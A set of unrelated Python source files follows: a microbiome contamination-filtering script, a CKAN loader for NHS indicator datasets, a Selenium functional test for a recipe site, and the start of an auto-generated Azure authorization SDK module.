abund_reinstated_seqs = compare_blank_abundances(contamination_stats_dict,
contamination_stats_header,
reinstatement_stat_sample,
reinstatement_stat_blank,
reinstatement_differential,
negate=False)
# Only consider seqs as reinstated if previously identified as contaminants
abund_reinstated_seqs = set(putative_contaminants) & set(abund_reinstated_seqs)
return(abund_reinstated_seqs)
def reinstate_incidence_seqs(putative_contaminants,
unique_seq_biom,
blank_sample_ids,
reinstatement_sample_number):
sample_biom = unique_seq_biom.filter(lambda val, id_, metadata:
id_ in blank_sample_ids, invert=True, inplace=False)
incidence_reinstated_seqs = sample_biom.pa().filter(
lambda val, id_, metadata: val.sum() >= reinstatement_sample_number,
axis='observation', inplace=False).ids(
axis='observation')
# Only consider seqs as reinstated if previously identified as contaminants
incidence_reinstated_seqs = set(putative_contaminants) & set(incidence_reinstated_seqs)
return(incidence_reinstated_seqs)
def mothur_counts_to_biom(mothur_fp):
mothur_biom = load_table(mothur_fp)
mothur_biom.type = u'OTU table'
filter_biom = mothur_biom.filter(
        lambda val, id_, metadata: id_ == 'total', invert=True)
return(filter_biom)
def biom_to_mothur_counts(biom_obj):
sample_ids = biom_obj.ids(axis='sample')
otu_ids = biom_obj.ids(axis='observation')
otu_totals = biom_obj.sum(axis='observation')
outstring = 'Representative_Sequence\ttotal\t' + '\t'.join(sample_ids) + '\n'
for otu in otu_ids:
otu_data = biom_obj.data(id = otu, axis = 'observation')
outstring += '{0}\t{1}\t{2}\n'.format(otu,
int(otu_data.sum()),
'\t'.join(str(x) for x in otu_data.astype('int')))
return(outstring)
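# biom_to_mothur_counts reproduces mothur's count_table layout: a header line
# 'Representative_Sequence<tab>total<tab><sample ids>' followed by one row per
# OTU giving its total and its per-sample integer counts.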
def prescreen_libraries(unique_seq_biom,
blank_sample_ids,
removal_stat_sample,
removal_stat_blank,
removal_differential,
prescreen_threshold):
contamination_stats_header, contamination_stats_dict = \
get_contamination_stats(unique_seq_biom, blank_sample_ids)
abund_contaminants = compare_blank_abundances(contamination_stats_dict,
contamination_stats_header,
removal_stat_sample,
removal_stat_blank,
removal_differential,
negate=True)
# make relabund table
norm_biom = unique_seq_biom.norm(inplace = False)
# filter out sequences marked as contaminants
norm_biom.filter(lambda val, id_, metadata: id_ in abund_contaminants,
axis='observation', invert=True, inplace=True)
# filter out samples above threshold
norm_biom.filter(lambda val, id_, metadata: sum(val) > prescreen_threshold,
axis='sample', invert=False, inplace=True)
    # The samples that remain are those passing the prescreen (low-contamination libraries)
above_threshold_samples = norm_biom.ids(axis='sample')
return above_threshold_samples
def get_contamination_stats(biom_file, blank_sample_ids=None, exp_sample_ids=[], proportional=False):
if not proportional:
biom_file = biom_file.norm(inplace=False)
header = ['maxS','avgS']
# Calculate blank stats if blank sample names are provided
if blank_sample_ids:
blanks = True
blank_data = biom_file.filter(blank_sample_ids, axis='sample',
invert=False, inplace=False).matrix_data
maxB = blank_data.max(axis=1).todense().tolist()
avgB = blank_data.mean(axis=1).tolist()
header.append('maxB')
header.append('avgB')
else:
# Otherwise, set the 'blanks' to an empty list
blank_sample_ids = []
blanks = False
# If specific list of experimental sample IDs aren't provided,
# assume everything not marked blank is an experimental sample
if len(exp_sample_ids) == 0:
exp_sample_ids = set(biom_file.ids(axis='sample')) - set(blank_sample_ids)
sample_data = biom_file.filter(exp_sample_ids, axis='sample',
invert=False, inplace=False).matrix_data
maxS = sample_data.max(axis=1).todense().tolist()
avgS = sample_data.mean(axis=1).tolist()
stats_dict = {}
i = 0
if blanks:
for otu in biom_file.ids(axis='observation'):
stats_dict[otu] = [maxS[i][0], avgS[i][0], maxB[i][0], avgB[i][0]]
i += 1
else:
for otu in biom_file.ids(axis='observation'):
stats_dict[otu] = [maxS[i][0], avgS[i][0]]
i += 1
return(header, stats_dict)
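# stats_dict maps each OTU id to [maxS, avgS] (plus [maxB, avgB] when blank
# sample ids are supplied); values are per-sample relative abundances unless
# the table was passed in with proportional=True.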
def pick_min_relabund_threshold(stats_dict, stats_header, min_relabund, sample_stat='maxS'):
i_s = stats_header.index(sample_stat)
passed_otus = set()
for otu in stats_dict:
if(float(stats_dict[otu][i_s]) < float(min_relabund)):
passed_otus.add(otu)
return(passed_otus)
def compare_blank_abundances(stats_dict, stats_header,
sample_stat, blank_stat, scalar=1, negate=False):
"""Note that this method will default to returning sequences for which
    the criterion sample_stat > blank_stat * scalar is TRUE, i.e. non-contam
sequences. To return contaminants (sequences that FAIL the inequality),
set negate to True."""
i_s = stats_header.index(sample_stat)
i_b = stats_header.index(blank_stat)
passed_otus = set()
for otu in stats_dict:
if((float(stats_dict[otu][i_s]) > (float(scalar) * float(stats_dict[otu][i_b]))) != negate):
passed_otus.add(otu)
# print passed_otus
return(passed_otus)
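# Worked example: with sample_stat='maxS', blank_stat='maxB' and scalar=0.1,
# an OTU with maxS=0.05 and maxB=0.2 satisfies 0.05 > 0.1 * 0.2, so it is
# returned when negate=False (kept as a non-contaminant) and omitted when
# negate=True.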
def calc_per_category_decontam_stats(biom_obj, filter_otus):
reads = biom_obj.filter(lambda val, id_, metadata: id_ in filter_otus,
axis='observation', invert=False, inplace=False).sum(axis = 'sample')
otus = biom_obj.pa(inplace = False).filter(lambda val, id_, metadata: id_ in filter_otus,
axis='observation', invert=False, inplace=False).sum(axis = 'sample')
return(reads.tolist(),otus.tolist())
def calc_per_library_decontam_stats(start_biom, output_dict):
# calculate starting number of sequences and unique sequences per library
steps = ['below_relabund_threshold','putative_contaminants','ever_good_seqs','reinstated_seqs','all_good_seqs']
results_dict = {}
results_dict['starting'] = calc_per_category_decontam_stats(start_biom, start_biom.ids(axis='observation'))
results_header = ['starting']
for step in steps:
if step in output_dict:
results_dict[step] = calc_per_category_decontam_stats(start_biom, output_dict[step])
results_header.append(step)
return(results_dict, results_header)
def filter_contaminated_libraries(unique_seq_biom, contaminant_otus, contam_threshold):
# make relabund table
norm_biom = unique_seq_biom.norm(inplace = False)
# filter out sequences marked as contaminants
norm_biom.filter(lambda val, id_, metadata: id_ in contaminant_otus,
axis='observation', invert=True, inplace=True)
# filter out samples above threshold
norm_biom.filter(lambda val, id_, metadata: sum(val) > contam_threshold,
axis='sample', invert=False, inplace=True)
# filter contam sequences from original biom
filtered_biom = unique_seq_biom.filter(lambda val, id_, metadata: id_ in contaminant_otus,
axis='observation', invert=True, inplace=False)
# filter samples that lost too much relative to starting from original biom
filtered_biom = filtered_biom.filter(lambda val, id_, metadata: id_ in norm_biom.ids(axis='sample'),
axis='sample', invert=False, inplace=True)
return(filtered_biom)
def print_filtered_otu_map(input_otu_map_fp, output_otu_map_fp, filter_set):
output_otu_map_f = open(output_otu_map_fp, 'w')
for line in open(input_otu_map_fp, 'U'):
seq_identifier = line.strip().split('\t')[0]
# write OTU line if present in the filter set
if seq_identifier in filter_set:
output_otu_map_f.write(line)
output_otu_map_f.close()
return
def print_filtered_mothur_counts(mothur_counts_fp, output_counts_fp, filter_set):
output_counts_f = open(output_counts_fp, 'w')
t = 0
for line in open(mothur_counts_fp, 'U'):
seq_identifier = line.strip().split('\t')[0]
        # only write this line if the otu is in the filter set,
        # or if it's the header (first) line
if seq_identifier in filter_set or t == 0:
output_counts_f.write(line)
t += 1
output_counts_f.close()
return
def print_per_library_stats(per_library_stats, per_library_stats_header, lib_ids, dropped_libs=[]):
outline = 'Library\t'
outline += '_reads\t'.join(per_library_stats_header) + '_reads\t'
outline += '_otus\t'.join(per_library_stats_header) + '_otus'
if len(dropped_libs) > 0:
outline += '\tlibrary_discarded'
discard = True
else:
discard = False
outline += '\n'
t = 0
for lib in lib_ids:
outline += lib
for category in per_library_stats_header:
outline += '\t' + str(int(per_library_stats[category][0][t]))
for category in per_library_stats_header:
outline += '\t' + str(int(per_library_stats[category][1][t]))
if discard:
if lib in dropped_libs:
outline += '\tTrue'
else:
outline += '\tFalse'
outline += '\n'
t += 1
return(outline)
def print_otu_disposition(input_seqs, output_dict, hierarchy=[]):
outline = ''
if hierarchy == []:
hierarchy = ['below_relabund_threshold', 'putative_contaminants','reinstated_seqs','ever_good_seqs']
# Subset hierarchy to levels also in output dict:
hierarchy = [x for x in hierarchy if x in output_dict]
# Check that the levels of the hierarchy are non-overlapping:
for x in range(len(hierarchy) - 1):
for y in range(x + 1,len(hierarchy)):
if not output_dict[hierarchy[x]].isdisjoint(output_dict[hierarchy[y]]):
print('warning: non-disjoint sets in the disposition hierarchy')
seqs_left = set(input_seqs)
for seq in input_seqs:
for level in hierarchy:
if seq in output_dict[level]:
outline += '{0}\t{1}\n'.format(seq,level)
break
return(outline)
def print_filtered_seq_headers(seq_headers, output_headers_fp, filter_set):
output_headers_f = open(output_headers_fp, 'w')
for x in seq_headers:
if x in filter_set:
output_headers_f.write('{0}\n'.format(x))
output_headers_f.close()
return
def print_filtered_output(output_method, unfiltered_input, output_dir, output_dict, output_categories=None):
output_fn = 'print_filtered_' + output_method
if not output_categories:
output_categories = output_dict.keys()
if output_method == 'seq_headers':
output_fn = print_filtered_seq_headers
elif output_method == 'mothur_counts':
output_fn = print_filtered_mothur_counts
elif output_method == 'otu_map':
output_fn = print_filtered_otu_map
for category in output_categories:
output_fn(unfiltered_input,
os.path.join(output_dir,
'{0}_{1}.txt'.format(category, output_method)),
output_dict[category])
return
def print_results_file(seq_ids,
output_dict,
output_fp,
stats_header=None,
stats_dict=None,
corr_data_dict=None):
output_f = open(output_fp, 'w')
header = "SeqID"
sorted_categories = sorted(output_dict.keys())
for category in sorted_categories:
header += '\t{0}'.format(category)
if stats_header:
for x in stats_header:
header += '\t{0}'.format(x)
if corr_data_dict:
header += '\t{0}\t{1}'.format('spearman_r','spearman_p')
output_f.write(header + '\n')
for otu in seq_ids:
outline = str(otu)
for category in sorted_categories:
outline += '\t{0}'.format(1 if otu in output_dict[category] else 0)
if stats_header:
t = 0
for x in stats_header:
outline += '\t{0:.3f}'.format(stats_dict[otu][t])
t += 1
if corr_data_dict:
outline += '\t{0:.3f}\t{1:.3f}'.format(
corr_data_dict[otu][0],
corr_data_dict[otu][1])
output_f.write(outline + '\n')
return
def main():
option_parser, opts, args = parse_command_line_parameters(**script_info)
otu_table_fp = opts.otu_table_fp
mothur_counts_fp = opts.mothur_counts_fp
mapping_fp = opts.mapping_fp
valid_states = opts.valid_states
blank_id_fp = opts.blank_id_fp
contaminant_db_fp = opts.contaminant_db_fp
contaminant_similarity = opts.contaminant_similarity
max_correlation = opts.max_correlation
correlate_header = opts.correlate_header
input_fasta_fp = opts.input_fasta_fp
otu_map_fp = opts.otu_map_fp
output_dir = opts.output_dir
min_relabund_threshold = opts.min_relabund_threshold
prescreen_threshold = opts.prescreen_threshold
removal_stat_blank = opts.removal_stat_blank
removal_stat_sample = opts.removal_stat_sample
removal_differential = opts.removal_differential
reinstatement_stat_sample = opts.reinstatement_stat_sample
reinstatement_stat_blank = opts.reinstatement_stat_blank
reinstatement_differential = opts.reinstatement_differential
reinstatement_sample_number = opts.reinstatement_sample_number
reinstatement_method = opts.reinstatement_method
write_output_seq_lists = opts.write_output_seq_lists
write_filtered_output = opts.write_filtered_output
drop_lib_threshold = opts.drop_lib_threshold
write_per_seq_stats = opts.write_per_seq_stats
write_per_library_stats = opts.write_per_library_stats
write_per_seq_disposition = opts.write_per_seq_disposition
# Make unique seq OTU table (biom file)
# Compute unique seq stats
# output biom file with unique seq stats
# Optionally: make candidate contaminant DB
# remove sequences present at higher abundance in samples
# cluster blanks
# remove low-abundance contaminant OTUs
# Filter by similarity against candidate contaminant DB
# annotate unique seq OTU table with top hit (OTU#, rep seq, ID%)
# make list of seqs @ threshold
# Calculate reinstatement rule for filtered sequences
# Generate lists of seqs failing:
# - unique seq rule
# - hit to contaminant
# - reinstatement after hit
# Make sure passed at least one of an OTU biom or mothur counts table file
input_file_counter = 0
if mothur_counts_fp:
input_file_counter += 1
unique_seq_biom = mothur_counts_to_biom(mothur_counts_fp)
mothur_output = True
print "mothur input"
if otu_table_fp:
input_file_counter += 1
unique_seq_biom = load_table(otu_table_fp)
mothur_output = False
print "BIOM input"
if input_file_counter != 1:
        option_parser.error("must provide ONLY ONE of an OTU table biom file or "
"mothur counts table")
# Check to make sure that if blank-based contamination filtering requested,
# all necessary options are specified:
removal_options_counter = 0
if removal_stat_blank:
removal_options_counter += 1
if removal_stat_sample:
removal_options_counter += 1
if removal_differential:
removal_options_counter += 1
if ((removal_options_counter > 0) and (removal_options_counter < 3)):
        option_parser.error("Must provide all of "
                            "removal_stat_blank, "
                            "removal_stat_sample, and "
                            "removal_differential, or none.")
elif removal_options_counter == 0:
blank_stats_removal = False
elif removal_options_counter == 3:
blank_stats_removal = True
# If reference-based filtering requested, make sure all necessary options
# have been specified:
if contaminant_db_fp and not input_fasta_fp:
option_parser.error("If specifying ref-based contaminant ID, must "
"also specify path to input sequence fasta")
# If correlation-based filtering requested, make sure correlate data
# are specified
if max_correlation and not correlate_header:
option_parser.error("If specifying maximum Spearman correlation, must "
"also provide map column header for correlate data")
# If sequence reinstatement is requested, make sure all necessary options
# are specified
reinstatement_options_counter = 0
if reinstatement_stat_blank:
reinstatement_options_counter += 1
if reinstatement_stat_sample:
reinstatement_options_counter += 1
if reinstatement_differential:
reinstatement_options_counter += 1
if ((reinstatement_options_counter > 0) and
(reinstatement_options_counter < 3)):
        option_parser.error("Must provide all of "
                            "reinstatement_stat_blank, "
                            "reinstatement_stat_sample, and "
                            "reinstatement_differential, or none.")
if ((reinstatement_options_counter == 3 and reinstatement_sample_number)
and not reinstatement_method):
option_parser.error("If providing sample number AND abundance criteria "
"for sequence reinstatement, must also provide "
"a method for combining results.")
if reinstatement_options_counter == 3 or reinstatement_sample_number:
reinstatement = True
else:
reinstatement = False
# get blank sample IDs from mapping file or sample ID list
if mapping_fp and valid_states:
blank_sample_ids = sample_ids_from_metadata_description(
open(mapping_fp, 'U'), valid_states)
blanks = True
elif blank_id_fp is not None:
blank_id_f = open(blank_id_fp, 'Ur')
blank_sample_ids = set([line.strip().split()[0]
for line in blank_id_f
if not line.startswith('#')])
blank_id_f.close()
blanks = True
else:
blanks = False
    # Initialize output objects
output_dict = {}
contaminant_types = []
contamination_stats_dict = None
contamination_stats_header = None
corr_data_dict = None
# Do blank-based stats calculations, if not there check to make sure no
# blank-dependent methods are requested:
if blanks:
if prescreen_threshold:
low_contam_libraries = prescreen_libraries(unique_seq_biom,
blank_sample_ids,
removal_stat_sample,
removal_stat_blank,
removal_differential,
prescreen_threshold)
contamination_stats_header, contamination_stats_dict = \
get_contamination_stats(unique_seq_biom,
blank_sample_ids,
exp_sample_ids=low_contam_libraries)
else:
contamination_stats_header, contamination_stats_dict = \
get_contamination_stats(unique_seq_biom, blank_sample_ids)
elif (blank_stats_removal or reinstatement or prescreen_threshold):
        option_parser.error("Blank-based filtering requested but no blank "
"samples indicated in mapping file or ID file.")
else:
contamination_stats_header, contamination_stats_dict = \
get_contamination_stats(unique_seq_biom)
seq_ids = unique_seq_biom.ids(axis='observation')
# Do blank-based contaminant identification
if min_relabund_threshold:
output_dict['below_relabund_threshold'] = pick_min_relabund_threshold(
contamination_stats_dict,
contamination_stats_header,
min_relabund_threshold)
if blank_stats_removal:
output_dict['abund_contaminants'] = compare_blank_abundances(contamination_stats_dict,
contamination_stats_header,
removal_stat_sample,
removal_stat_blank,
removal_differential,
negate=True)
contaminant_types.append('abund_contaminants')
# Do reference-based contaminant identification
if contaminant_db_fp:
output_dict['ref_contaminants'] = pick_ref_contaminants(seq_ids, contaminant_db_fp, input_fasta_fp, contaminant_similarity, output_dir)
contaminant_types.append('ref_contaminants')
# Do spearman correlation based contaminant identification
if max_correlation:
metadata_dict = parse_mapping_file_to_dict(open(mapping_fp, 'U'))[0]
corr_data_dict = {x: float(metadata_dict[x][correlate_header]) for x in metadata_dict}
output_dict['corr_contaminants'], corr_contaminant_dict = pick_corr_contaminants(unique_seq_biom,
corr_data_dict,
max_correlation)
contaminant_types.append('corr_contaminants')
else:
corr_contaminant_dict = None
# Putative contaminants are those that have been identified by any method
output_dict['putative_contaminants'] = set.union(*map(set, [output_dict[x] for x in contaminant_types]))
# If considering low abundance sequences, remove those from consideration as potential contaminants
if 'below_relabund_threshold' in output_dict:
output_dict['putative_contaminants'] = output_dict['putative_contaminants'] - set(output_dict['below_relabund_threshold'])
# Pick abundance-criterion seqs to reinstate
if (reinstatement_stat_blank and reinstatement_stat_sample and reinstatement_differential):
output_dict['abund_reinstated_seqs'] = reinstate_abund_seqs(output_dict['putative_contaminants'],
contamination_stats_dict,
contamination_stats_header,
reinstatement_stat_sample,
reinstatement_stat_blank,
reinstatement_differential)
output_dict['reinstated_seqs'] = output_dict['abund_reinstated_seqs']
# Pick incidence-criterion seqs to reinstate
if reinstatement_sample_number:
output_dict['incidence_reinstated_seqs'] = reinstate_incidence_seqs(
output_dict['putative_contaminants'],
unique_seq_biom,
blank_sample_ids,
reinstatement_sample_number)
output_dict['reinstated_seqs'] = output_dict['incidence_reinstated_seqs']
# combine incidence and abundance reinstatements
if reinstatement_sample_number and reinstatement_stat_blank:
if reinstatement_method == "union":
output_dict['reinstated_seqs'] = output_dict['abund_reinstated_seqs'] | output_dict['incidence_reinstated_seqs']
elif reinstatement_method == "intersection":
output_dict['reinstated_seqs'] = output_dict['abund_reinstated_seqs'] & output_dict['incidence_reinstated_seqs']
    # make the set of sequences never identified as contaminants:
output_dict['ever_good_seqs'] = set(seq_ids) - output_dict['putative_contaminants']
# If considering low abundance sequences, remove those from consideration as potential contaminants
if 'below_relabund_threshold' in output_dict:
output_dict['ever_good_seqs'] = output_dict['ever_good_seqs'] - set(output_dict['below_relabund_threshold'])
# Make set of good seqs for final filtering
final_good_seqs = output_dict['ever_good_seqs']
# ...and those either never ID'd as contaminants or reinstated:
if reinstatement:
output_dict['all_good_seqs'] = set(output_dict['ever_good_seqs'] | output_dict['reinstated_seqs'])
final_good_seqs = output_dict['all_good_seqs']
# ...and those who remain contaminants after reinstatement:
    output_dict['never_good_seqs'] = set(output_dict['putative_contaminants'] - output_dict.get('reinstated_seqs', set()))
# print filtered OTU maps if given a QIIME OTU map input
if otu_map_fp:
print_filtered_output('otu_map', otu_map_fp, output_dir, output_dict)
# print filtered Mothur counts tables if given a Mothur counts table input
if mothur_output:
print_filtered_output('mothur_counts', mothur_counts_fp, output_dir, output_dict)
# print filtered seq header files if requested
if write_output_seq_lists:
print_filtered_output('seq_headers', seq_ids, output_dir, output_dict)
# filter final biom file to just good seqs
filtered_biom = unique_seq_biom.filter(lambda val, id_, metadata: id_ in final_good_seqs,
axis='observation', invert=False, inplace=False)
# drop heavily contaminated libraries if requested
if drop_lib_threshold:
dropped_libs = unique_seq_biom.norm(inplace=False).filter(lambda val, id_, metadata: id_ in final_good_seqs,
axis='observation', invert=False, inplace=False).filter(lambda val, id_, metadata: sum(val) >= drop_lib_threshold,
axis='sample', invert=True, inplace=False).ids(axis='sample')
filtered_biom.filter(lambda val, id_, metadata: id_ in dropped_libs,
axis='sample', invert=True, inplace=True)
else:
dropped_libs = []
# print filtered biom/mothur_output if library filtering is requested
if write_filtered_output:
if mothur_output:
output_counts_string = biom_to_mothur_counts(filtered_biom)
with open(os.path.join(output_dir,'decontaminated_table.counts'), "w") as output_counts_file:
output_counts_file.write(output_counts_string)
else:
output_biom_string = filtered_biom.to_json('Filtered by decontaminate.py')
with open(os.path.join(output_dir,'decontaminated_otu_table.biom'), "w") as output_biom_file:
output_biom_file.write(output_biom_string)
# print per-library stats if requested
if write_per_library_stats:
per_library_stats, per_library_stats_header = calc_per_library_decontam_stats(unique_seq_biom, output_dict)
library_stats_string = print_per_library_stats(per_library_stats, per_library_stats_header, unique_seq_biom.ids(axis='sample'), dropped_libs=dropped_libs)
with open(os.path.join(output_dir,'decontamination_per_library_stats.txt'), "w") as output_stats_file:
output_stats_file.write(library_stats_string)
# print otu by disposition file if requested
if write_per_seq_disposition:
per_seq_disposition = print_otu_disposition(seq_ids, output_dict)
with open(os.path.join(output_dir,'decontamination_per_otu_disposition.txt'), "w") as output_stats_file:
output_stats_file.write(per_seq_disposition)
# print log file / per-seq info
if write_per_seq_stats:
print_results_file(seq_ids,
output_dict,
os.path.join(output_dir,'contamination_summary.txt'),
contamination_stats_header,
contamination_stats_dict,
corr_contaminant_dict)
if __name__ == "__main__":
main()
| tanaes/decontaminate | decontaminate_unitary.py | Python | mit | 40,011 |
"""
Load the CCGOIS datasets into a CKAN instance
"""
import dc
import json
import slugify
import ffs
def make_name_from_title(title):
# For some reason, we're finding duplicate names
name = slugify.slugify(title).lower()[:99]
if not name.startswith('ccgois-'):
name = u"ccgois-{}".format(name)
return name
def load_ccgois(datasets):
for metadata in datasets:
resources = [
dict(
description=r['description'],
name=r['name'],
format=r['filetype'],
url=r['url']
)
for r in metadata['resources']
]
print [r['name'] for r in metadata['resources']]
metadata['title'] = u'CCGOIS - {}'.format(metadata['title'])
metadata['name'] = make_name_from_title(metadata['title'])
print u'Creating {}'.format(metadata['name'])
dc.Dataset.create_or_update(
name=metadata['name'],
title=metadata['title'],
state='active',
license_id='uk-ogl',
notes=metadata['description'],
origin='https://indicators.ic.nhs.uk/webview/',
tags=dc.tags(*metadata['keyword(s)']),
resources=resources,
#frequency=[metadata['frequency'], ],
owner_org='hscic',
extras=[
dict(key='frequency', value=metadata.get('frequency', '')),
dict(key='coverage_start_date', value=metadata['coverage_start_date']),
dict(key='coverage_end_date', value=metadata['coverage_end_date']),
dict(key='domain', value=metadata['domain']),
dict(key='origin', value='HSCIC'),
dict(key='next_version_due', value=metadata['next version due']),
dict(key='nhs_OF_indicators', value=metadata['nhs_of_indicators']),
dict(key='HSCIC_unique_id', value=metadata['unique identifier']),
dict(key='homepage', value=metadata['homepage']),
dict(key='status', value=metadata['status']),
dict(key='language', value=metadata['language']),
dict(key='assurance_level', value=metadata['assurance_level']),
dict(key='release_date', value=metadata['current version uploaded'])
]
)
return
def group_ccgois(datasets):
for metadata in datasets:
dataset_name = make_name_from_title(metadata['title'])
try:
dataset = dc.ckan.action.package_show(id=dataset_name)
except:
print "Failed to find dataset: {}".format(dataset_name)
print "Can't add to group"
continue
if [g for g in dataset.get('groups', []) if g['name'] == 'ccgois']:
print 'Already in group', g['name']
else:
dc.ckan.action.member_create(
id='ccgois',
object=dataset_name,
object_type='package',
capacity='member'
)
return
def main(workspace):
DATA_DIR = ffs.Path(workspace)
datasets = json.load(open(DATA_DIR / 'ccgois_indicators.json'))
dc.ensure_publisher('hscic')
dc.ensure_group('ccgois')
load_ccgois(datasets)
group_ccgois(datasets)
| nhsengland/publish-o-matic | datasets/ccgois/load.py | Python | mit | 3,287 |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from .base import FunctionalTest
class RecipeEditTest(FunctionalTest):
def test_can_add_a_recipe(self):
# Ben goes to the recipe website homepage
self.browser.get(self.server_url)
# He notices the page title mention cookbook
self.assertIn('cookbook', self.browser.title)
# He is invited to enter his name to create his own cookbook or
# view other user's cookbook's
# Ben wants to create his own right now, so he enters his name
# and then clicks the 'get started button'
# TODO -- duplication here. consider refactoring if there is a third instance
username_input = self.browser.find_element_by_id('id_username')
username_input.send_keys('ben')
username_input.send_keys(Keys.ENTER)
# Ben goes to a unique URL which includes his name
ben_url = self.browser.current_url
self.assertRegex(ben_url, '/users/ben.+')
# He is invited to click on a link to add a new recipe
add_recipe_button = self.browser.find_element_by_id('id_add_recipe_button')
self.assertIn('Add recipe', add_recipe_button.text)
# He clicks on the link and new page appears
add_recipe_button.click()
# When he adds a new recipe, he is taken to a new URL
self.assertRegex(self.browser.current_url, '/users/.*/add_recipe')
# He sees a form with a textbox for name, ingredients, directions and servings
# along with a 'cancel' and 'add' button
header_text = self.browser.find_element_by_tag_name('h1').text
self.assertIn('Add Recipe', header_text)
name_textbox = self.browser.find_element_by_id('id_title')
self.assertEqual(name_textbox.get_attribute('placeholder'),
'Enter the title of the recipe')
ingredients_textbox = self.browser.find_element_by_id('id_ingredients')
directions_textbox = self.browser.find_element_by_id('id_directions')
servings_textbox = self.browser.find_element_by_id('id_servings')
add_button = self.browser.find_element_by_id('id_add_button')
# He types in Grilled Halibut with Mango-Avocado Salsa into the textbox for name
name_textbox.send_keys('Grilled Halibut with Mango-Avocado Salsa')
# He types in ingredients:
ingredients_textbox.send_keys('1 medium ripe avocado, peeled and cut into 1/2" dice')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('1 medium ripe mango, peeled and cut into 1/2" dice')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('1 cup cherry tomatoes, quartered')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('4 large fresh basil leaves, thinly sliced')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('3 tablespoons extra-virgin olive oil, divided, plus more for brushing')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('3 tablespoons fresh lime juice, divided')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('Kosher salt and freshly ground black pepper')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('4 6-ounce halibut or mahi-mahi fillets')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('4 lime wedges')
# He then types in the following for directions:
directions_textbox.send_keys('Prepare a grill to medium-high heat. Gently combine the avocado, mango, '
'tomatoes, basil, 1 tablespoon oil, and 1 tablespoon lime juice in a large mixing '
'bowl. Season salsa to taste with salt and pepper and set aside at room '
'temperature, gently tossing occasionally.')
directions_textbox.send_keys(Keys.ENTER)
directions_textbox.send_keys('Place fish fillets in a 13x9x2" glass baking dish. Drizzle remaining 2 '
'tablespoon oil and 2 tablespoon lime juice over. Season fish with salt and '
'pepper. Let marinate at room temperature for 10 minutes, turning fish '
'occasionally.')
directions_textbox.send_keys(Keys.ENTER)
directions_textbox.send_keys('Brush grill rack with oil. Grill fish until just opaque in center, about 5 '
'minutes per side. Transfer to plates. Spoon mango-avocado salsa over fish. '
'Squeeze a lime wedge over each and serve.')
# He then types in the servings
servings_textbox.send_keys('7')
# Finally, he clicks the add button
add_button.click()
# He is returned to the main page
# He sees that the recipe appears in the list of recipes
self.check_for_row_in_list_table('Grilled Halibut with Mango-Avocado Salsa')
# Ben then clicks on a recipe to get the full info
recipe_link = self.browser.find_element_by_link_text('Grilled Halibut with Mango-Avocado Salsa')
recipe_link.click()
# He is taken to a new page which has the title in the url
self.assertRegex(self.browser.current_url, '/users/(\S+)/recipe/grilled-halibut-with-mango-avocado-salsa')
# The new page lists all of the ingredients and directions
page_text = self.browser.find_element_by_tag_name('body').text
self.assertIn('1 medium ripe avocado, peeled and cut into 1/2" dice', page_text)
self.assertIn('Prepare a grill to medium-high heat. Gently combine the avocado, mango, ', page_text)
# He then remembers that the servings are for 8 people and a chili pepper is needed. He clicks
# on the edit button to start editing
edit_button = self.browser.find_element_by_id('id_edit_button')
self.assertIn('Edit', edit_button.text)
edit_button.click()
# The edit page shows the same text as before
page_text = self.browser.find_element_by_tag_name('body').text
self.assertIn('1 medium ripe avocado, peeled and cut into 1/2" dice', page_text)
self.assertIn('Prepare a grill to medium-high heat. Gently combine the avocado, mango, ', page_text)
# He changes the number of servings from 7 to 8
servings_textbox = self.browser.find_element_by_id('id_servings')
servings_textbox.send_keys(Keys.BACKSPACE)
servings_textbox.send_keys('8')
# He adds chili pepper to the list of ingredients
ingredients_textbox = self.browser.find_element_by_id('id_ingredients')
ingredients_textbox.send_keys(Keys.ENTER)
ingredients_textbox.send_keys('1 chili pepper')
# He adds a note for next time
notes_textbox = self.browser.find_element_by_id('id_notes')
notes_textbox.send_keys("Wasn't that spicy, added a pepper")
# He then clicks the save button
save_button = self.browser.find_element_by_id('id_save_button')
self.assertIn('Save', save_button.text)
save_button.click()
# He is returned to the recipe page
self.assertRegex(self.browser.current_url, '/users/(\S+)/recipe/grilled-halibut-with-mango-avocado-salsa')
# He can see his changes reflected on the page
page_text = self.browser.find_element_by_tag_name('body').text
self.assertIn('8', page_text)
self.assertNotIn('7', page_text)
self.assertIn('1 chili pepper', page_text)
self.assertIn('added a pepper', page_text)
#self.fail('Finish the test')
# He changes his mind and cancels
# cancel_button = self.browser.find_element_by_name('id_cancel_button')
#cancel_button.click()
# He is returned to the main page
# The number of recipes is still 1
# table = self.browser.find_element_by_id('id_recipe_table')
# rows = table.find_element_by_tag_name('tr')
#self.assertEqual(len(rows), 1)
| benosment/recipes | functional_tests/test_edit_recipe.py | Python | mit | 8,273 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PermissionsOperations:
"""PermissionsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.authorization.v2018_01_01_preview.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
